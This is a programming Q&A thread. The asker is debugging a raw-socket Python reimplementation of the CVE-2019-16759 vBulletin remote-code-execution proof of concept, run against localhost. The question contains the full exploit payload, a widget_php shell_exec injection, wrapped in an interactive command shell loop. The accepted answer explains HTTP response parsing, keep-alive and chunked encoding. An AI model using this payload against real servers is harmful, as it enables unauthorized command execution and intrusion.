# Raw Sockets taking 5 seconds for a response on localhost

Tags: python, sockets, websocket

I am trying to create a raw socket implementation of the [CVE-2019-16759 proof of concept](https://seclists.org/fulldisclosure/2019/Sep/31).

When my code runs, it makes the correct `POST` request, and gets back the response [looking at WireShark I can confirm this], but it takes 5 seconds, while the non-socket implementation is instant.

I've noticed that the `POST` request has this "continuation" part in the packet info, that I don't see when running the proof of concept.

[image]

My socket library that creates the `POST` request:

```py
import socket
import urllib.parse

class socket_http:

    req = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def __init__(self, HOSTURL, PORT=80, COMMAND="id"):
        self.parsedURL = urllib.parse.urlparse(HOSTURL)
        self.PORT = PORT
        self.cmd = COMMAND
        self.req.connect((self.parsedURL.netloc,PORT))

    def closeSocket(self):
        self.req.close()

    def post(self, URL, connectionType="", HTTP_version="1.1"):
        postURL = urllib.parse.urlparse(URL)

        postReq = ""
        if postURL.path == "":
            postReq += "POST / HTTP/" + HTTP_version + "\r\n"
        else:
            postReq += "POST " + postURL.path + " HTTP/" + HTTP_version + "\r\n"
        postReq += "Host: " + postURL.netloc + ":" + str(self.PORT) + "\r\n"
        postReq += "User-Agent: python-requests/2.21.0\r\n"
        postReq += "Accept-Encoding: gzip, deflate\r\n"
        postReq += "Accept: */*\r\n"
        postReq += "Connection: keep-alive\r\n"
        postReq += "Content-Length: " + str(len("routestring=ajax/render/widget_php&widgetConfig[code]=echo shell_exec('" + self.cmd + "'); exit;")) + "\r\n"
        postReq += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        postReq += "routestring=ajax/render/widget_php&widgetConfig[code]=echo shell_exec('" + self.cmd + "'); exit;\r\n"

        self.req.send(postReq.encode())

        chunks = []
        while True:
            chunk = self.req.recv(int(1024)).decode()
            if chunk:
                chunks.append(1024)
            else:
                break

        return ''.join(chunks)
```

My code that runs the exploit:

```py
from socket_req import socket_http as socket
import sys

HOST = "http://127.0.0.1"
PORT = 82

while True:
    try:
        session = socket(HOST, PORT)
        session.cmd = input("$hell~")
        print(session.cmd)
        answer = session.post(HOST)
        print(answer)
        session.closeSocket()
    except KeyboardInterrupt as e:
        session.closeSocket()
        sys.exit("\nClosing shell...")
    except Exception as e:
        session.closeSocket()
        sys.exit(str(e))
```

I want to find the root issue to why the request is taking so long to reply compared to the POC, which is instant (you can see in the WireShark capture that the `POST` request was sent at 2.3 seconds and the reply comes at 7.3 seconds). When I run this script, this is what happens:

```
$hell~ls
ls
'utf-8' codec can't decode byte 0x8b in position 274: invalid start byte
```

I believe there are two issues here, the first being the long delay and the second being the "invalid start byte" error.

Comment: Are you sure your content-length header is correct? I suggest that you create the string once in a different variable (instead of writing the same code twice) and collect it's length. This would prevent surprises if you change anything.

Comment: Yea that was one of the first things I check and double checked. Good idea on the variable!

Answer (score 1, accepted):

Your client code is not parsing the server's response at all.  It is just blindly reading arbitrary chunks of data until there is nothing left to read.

You need to **PARSE THE RESPONSE** in order to know:

- how much data is actually being sent.
- in what encoding format the data is being sent (in particular, whether HTTP's `Transfer-Encoding: chunked` encoding is being used or not).
- whether the server leaves the connection open or closes it after sending the response.

You need to parse the response to know when you have reached the end of the response and should STOP READING.  Refer to [RFC 2616 Section 4.4](https://www.rfc-editor.org/rfc/rfc2616#section-4.4) and [RFC 7230 Section 3.3](https://www.rfc-editor.org/rfc/rfc7230#section-3.3) for the proper rules you need to follow to detect the end of the response (look at the pseudo code in [this answer](https://stackoverflow.com/a/19211701/65863) to [When is an HTTP response finished?](https://stackoverflow.com/questions/19199066/)).

Since your client is sending `Connection: keep-alive` in its request, the server is likely actually keeping the connection open (ie, there is no `Connection: close` header in the response), in which case your client would just sit there idle waiting for more data to arrive after it has reached the end of the response.  Eventually, the server will close the connection when the client doesn't send a new HTTP request over the same connection (check if the response has a `Keep-Alive` header specifying a `timeout` interval).  That would account for the delay you are experiencing.

If you are not going to parse the response to detect the proper end of transmission, then try sending `Connection: close` instead in your HTTP request so the server will close the connection at the end of the response, breaking your reading loop immediately at the end of the response.  You would still need to handle `Transfer-Encoding: chunked` properly, though.

Only once you reach the end of the response, and have buffered all of the raw body data, can you then `decode()` the complete data.  You are trying to `decode()` each arbitrary block of raw bytes, which will not work for multi-byte charsets like UTF-8 if byte sequences straddle across block boundaries.  It also won't work correctly if you don't account for, and strip off, any HTTP `chunked` boundaries.